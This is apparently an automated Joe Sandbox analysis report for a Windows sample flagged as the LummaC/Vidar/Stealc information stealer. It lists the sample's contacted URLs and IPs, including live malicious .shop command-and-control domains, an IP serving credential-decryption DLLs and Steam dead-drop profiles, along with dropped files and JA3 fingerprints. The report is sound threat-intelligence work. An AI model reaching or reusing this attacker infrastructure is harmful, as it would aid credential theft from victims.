https://community.akamai.steamstatic.com/	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://recaptcha.net/recaptcha/;	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199780418869/inventory/	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/O	RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://broadcast.st.dl.eccdnx.com	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/ts1ca.crl0	66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://login.steampowered.com/	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/legal/	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.000000000133A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434760341.000000000129E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://genedjestytw.shop/	RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	FHCAEG.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://116.203.165.127/freebl3.dll~t	RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://aia.entrust.net/ts1-chain256.cer01	66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/	76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://127.0.0.1:27060	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	RegAsm.exe, 00000003.00000002.2383468411.0000000001490000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, KFIJJE.3.dr	false	URL Reputation: safe	unknown
https://api.steampowered.com/	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/mobile	RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://carrtychaintnyw.shop/	RegAsm.exe, 00000009.00000002.2434838718.00000000012A7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://player.vimeo.com	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.c	RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://116.203.165.127/softokn3.dllS	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://cowod.hopto.org	RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://milldymarskwom.shop/2	RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199780418869/badges	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.0000000001328000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com	RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.88.61	chickerkuso.shop	United States	13335	CLOUDFLARENETUS	true
172.67.192.105	carrtychaintnyw.shop	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	opponnentduei.shop	European Union	13335	CLOUDFLARENETUS	true
116.203.165.127	unknown	Germany	24940	HETZNER-ASDE	true
172.67.204.62	questionmwq.shop	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	milldymarskwom.shop	European Union	13335	CLOUDFLARENETUS	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
23.192.247.89	unknown	United States	16625	AKAMAI-ASUS	false
104.21.75.242	metallygaricwo.shop	United States	13335	CLOUDFLARENETUS	true
23.50.98.133	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1514409
Start date and time:	2024-09-20 11:06:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@16/24@13/11
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 90 Number of non-executed functions: 219
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:07:30	API Interceptor	3x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.88.61	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
172.67.192.105	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	https://atlas-aerspace.online/846be6651ef0dafb37a1a3c0e18c6c7c65a088de58971LOG846be6651ef0dafb37a1a3c0e18c6c7c65a088de58972	Get hash	malicious	Unknown	Browse
	https://atlas-aerspace.online/846be6651ef0dafb37a1a3c0e18c6c7c65a088de58971LOG846be6651ef0dafb37a1a3c0e18c6c7c65a088de58972	Get hash	malicious	Unknown	Browse
	https://atlas-aerspace.online/846be6651ef0dafb37a1a3c0e18c6c7c65a088de58971LOG846be6651ef0dafb37a1a3c0e18c6c7c65a088de58972	Get hash	malicious	Unknown	Browse
	https://publuu.com/flip-book/359793/824438	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://publuu.com/flip-book/359793/824438	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
188.114.97.3	http://www.pro-pharma.co.uk	Get hash	malicious	Unknown	Browse	proph.co.uk/blog/
	DHL documents_PDF.exe	Get hash	malicious	FormBook	Browse	www.hindo.top/b31a/?xVJtG4Qx=NzSChTKNjjtA9oOpLl4rXJIvEV3PrPKyZnQBhjSYE3dzUwTxd/TkmyQCL+Cn4jVtP9cc&9rT=ndrxUr
	PAGO $830.900.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/mquw/
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/TX2daF45/download
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/mCJwtLTf/download
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/KiyXDELa/download
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/mCJwtLTf/download
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/G1NY5FRK/download
	SwiftMesaj.pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse	vlha.shop/LP341/index.php
	Petronas request for-quotation.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chickerkuso.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.88.61
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.88.61
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.173.81
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.173.81
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.88.61
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.173.81
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.173.81
opponnentduei.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
milldymarskwom.shop	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
steamcommunity.com	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.192.247.89
	https://github-scanner.com	Get hash	malicious	CAPTCHA Scam	Browse	23.192.247.89
	l6E.exe	Get hash	malicious	LummaC	Browse	23.197.127.21
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.197.127.21
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.197.127.21
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.192.247.89
	https://steamcommninty.com/stalkerbeta/5307511526	Get hash	malicious	Unknown	Browse	23.67.133.187

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Bonus_Payments_Health_Insurance_Vacation_Policy_Update_20243568Acer Liquid Z63568.pdf	Get hash	malicious	Unknown	Browse	104.18.69.40
	https://www.thegivingspirit.org/	Get hash	malicious	Unknown	Browse	104.16.79.73
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	updater.exe	Get hash	malicious	RHADAMANTHYS	Browse	188.114.96.3
	Requirements_9d8f9b8.scr	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://www.google.co.ls/url?url=https://pjgzknracpucs&cu=yxzbqlc&dknmbu=neq&ilrcq=atzggn&vra=ijlrrlr&yhbyc=bzlzgg&frfp=ynolmdfb&jkcxlp=ajlekjss&q=amp/asterpetroleo.com/.cgi-bin/6ce6/IXHMG/c3ViYWllbUBiZWluLmNvbQ==&ljxfk=cnjfey&kqdqaeo=gnfcrepa&ddayyvkbt=qg&mhg=xzmbrfwuc&veu=gbmtcee&wusgzo=nbo&bmtdy=vnrwhp&ifb=rklwlup&kiiou=sfajza&vegi=crbiqqli&nkuoui=amzherpj&hvj=wtzg&bseos=yhnhxn&yhucgnu=mianxbuq&sewtmxxvi=lu&ndv=eomqodtth&ysq=ovjbkam&jvrehd=hcd&votrm=bedgkv&mrj=oxokzew&gythv=keqhcg&wcqw=ranlyiwi&jtcxme=prbgwkpp&ewl=zsaz&aoaoy=mxpxen&pqarhgs=vabchqht&arvcbmbum=ov&sad=rncnzmjhl&xgw=ncegjdk&jpaxcj=tav&iihwq=hdebgl&ukv=qcjmtvy&vtpue=cdwxlt&jpws=xniphwaj&tokvsg=nrkywccw	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://github-scanner.com	Get hash	malicious	CAPTCHA Scam	Browse	1.1.1.1
	PAYMENT CONFIRMATION FOR 9182024.html	Get hash	malicious	Phisher	Browse	104.16.123.96
	BraveBrowserSetup-BRV002.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
HETZNER-ASDE	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	https://yaqoot-alsama.com/o/?(:3Y9s2NV8xX32vaWINlJnJhmQUm5KTk5lQTOdIkPVVTRVIxNzASMjAyNFUZNTASMTcQ==	Get hash	malicious	Unknown	Browse	78.46.39.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.202.0.195
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.202.0.195
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.202.0.195
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	116.202.0.195
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.202.0.195
	http://redirectblacklitss-e3z.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	136.243.59.248
	blockchair_statement.pdf.lnk	Get hash	malicious	Unknown	Browse	136.243.166.195
CLOUDFLARENETUS	Bonus_Payments_Health_Insurance_Vacation_Policy_Update_20243568Acer Liquid Z63568.pdf	Get hash	malicious	Unknown	Browse	104.18.69.40
	https://www.thegivingspirit.org/	Get hash	malicious	Unknown	Browse	104.16.79.73
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	updater.exe	Get hash	malicious	RHADAMANTHYS	Browse	188.114.96.3
	Requirements_9d8f9b8.scr	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://www.google.co.ls/url?url=https://pjgzknracpucs&cu=yxzbqlc&dknmbu=neq&ilrcq=atzggn&vra=ijlrrlr&yhbyc=bzlzgg&frfp=ynolmdfb&jkcxlp=ajlekjss&q=amp/asterpetroleo.com/.cgi-bin/6ce6/IXHMG/c3ViYWllbUBiZWluLmNvbQ==&ljxfk=cnjfey&kqdqaeo=gnfcrepa&ddayyvkbt=qg&mhg=xzmbrfwuc&veu=gbmtcee&wusgzo=nbo&bmtdy=vnrwhp&ifb=rklwlup&kiiou=sfajza&vegi=crbiqqli&nkuoui=amzherpj&hvj=wtzg&bseos=yhnhxn&yhucgnu=mianxbuq&sewtmxxvi=lu&ndv=eomqodtth&ysq=ovjbkam&jvrehd=hcd&votrm=bedgkv&mrj=oxokzew&gythv=keqhcg&wcqw=ranlyiwi&jtcxme=prbgwkpp&ewl=zsaz&aoaoy=mxpxen&pqarhgs=vabchqht&arvcbmbum=ov&sad=rncnzmjhl&xgw=ncegjdk&jpaxcj=tav&iihwq=hdebgl&ukv=qcjmtvy&vtpue=cdwxlt&jpws=xniphwaj&tokvsg=nrkywccw	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://github-scanner.com	Get hash	malicious	CAPTCHA Scam	Browse	1.1.1.1
	PAYMENT CONFIRMATION FOR 9182024.html	Get hash	malicious	Phisher	Browse	104.16.123.96
	BraveBrowserSetup-BRV002.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
CLOUDFLARENETUS	Bonus_Payments_Health_Insurance_Vacation_Policy_Update_20243568Acer Liquid Z63568.pdf	Get hash	malicious	Unknown	Browse	104.18.69.40
	https://www.thegivingspirit.org/	Get hash	malicious	Unknown	Browse	104.16.79.73
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	updater.exe	Get hash	malicious	RHADAMANTHYS	Browse	188.114.96.3
	Requirements_9d8f9b8.scr	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://www.google.co.ls/url?url=https://pjgzknracpucs&cu=yxzbqlc&dknmbu=neq&ilrcq=atzggn&vra=ijlrrlr&yhbyc=bzlzgg&frfp=ynolmdfb&jkcxlp=ajlekjss&q=amp/asterpetroleo.com/.cgi-bin/6ce6/IXHMG/c3ViYWllbUBiZWluLmNvbQ==&ljxfk=cnjfey&kqdqaeo=gnfcrepa&ddayyvkbt=qg&mhg=xzmbrfwuc&veu=gbmtcee&wusgzo=nbo&bmtdy=vnrwhp&ifb=rklwlup&kiiou=sfajza&vegi=crbiqqli&nkuoui=amzherpj&hvj=wtzg&bseos=yhnhxn&yhucgnu=mianxbuq&sewtmxxvi=lu&ndv=eomqodtth&ysq=ovjbkam&jvrehd=hcd&votrm=bedgkv&mrj=oxokzew&gythv=keqhcg&wcqw=ranlyiwi&jtcxme=prbgwkpp&ewl=zsaz&aoaoy=mxpxen&pqarhgs=vabchqht&arvcbmbum=ov&sad=rncnzmjhl&xgw=ncegjdk&jpaxcj=tav&iihwq=hdebgl&ukv=qcjmtvy&vtpue=cdwxlt&jpws=xniphwaj&tokvsg=nrkywccw	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://github-scanner.com	Get hash	malicious	CAPTCHA Scam	Browse	1.1.1.1
	PAYMENT CONFIRMATION FOR 9182024.html	Get hash	malicious	Phisher	Browse	104.16.123.96
	BraveBrowserSetup-BRV002.exe	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	116.203.165.127
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	116.203.165.127
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.88.61 172.67.192.105 188.114.97.3 172.67.204.62 188.114.96.3 23.192.247.89 104.21.75.242
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.88.61 172.67.192.105 188.114.97.3 172.67.204.62 188.114.96.3 23.192.247.89 104.21.75.242
	ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	104.21.88.61 172.67.192.105 188.114.97.3 172.67.204.62 188.114.96.3 23.192.247.89 104.21.75.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	104.21.88.61 172.67.192.105 188.114.97.3 172.67.204.62 188.114.96.3 23.192.247.89 104.21.75.242
	l6E.exe	Get hash	malicious	LummaC	Browse	104.21.88.61 172.67.192.105 188.114.97.3 172.67.204.62 188.114.96.3 23.192.247.89 104.21.75.242
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.88.61 172.67.192.105 188.114.97.3 172.67.204.62 188.114.96.3 23.192.247.89 104.21.75.242
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.88.61 172.67.192.105 188.114.97.3 172.67.204.62 188.114.96.3 23.192.247.89 104.21.75.242
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.88.61 172.67.192.105 188.114.97.3 172.67.204.62 188.114.96.3 23.192.247.89 104.21.75.242
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.88.61 172.67.192.105 188.114.97.3 172.67.204.62 188.114.96.3 23.192.247.89 104.21.75.242
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.88.61 172.67.192.105 188.114.97.3 172.67.204.62 188.114.96.3 23.192.247.89 104.21.75.242
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.50.98.133 45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.50.98.133 45.132.206.251
	Sz#U00e1mla_401337541#U00b7pdf.vbe	Get hash	malicious	Remcos, GuLoader	Browse	23.50.98.133 45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.50.98.133 45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.50.98.133 45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.50.98.133 45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.50.98.133 45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.50.98.133 45.132.206.251
	app__v6.25.3_.msi	Get hash	malicious	Unknown	Browse	23.50.98.133 45.132.206.251
	blockchair_statement.pdf.lnk	Get hash	malicious	Unknown	Browse	23.50.98.133 45.132.206.251

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\BAAEHDBFID.exe	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Created / dropped Files

C:\ProgramData\BAAEHDBFID.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
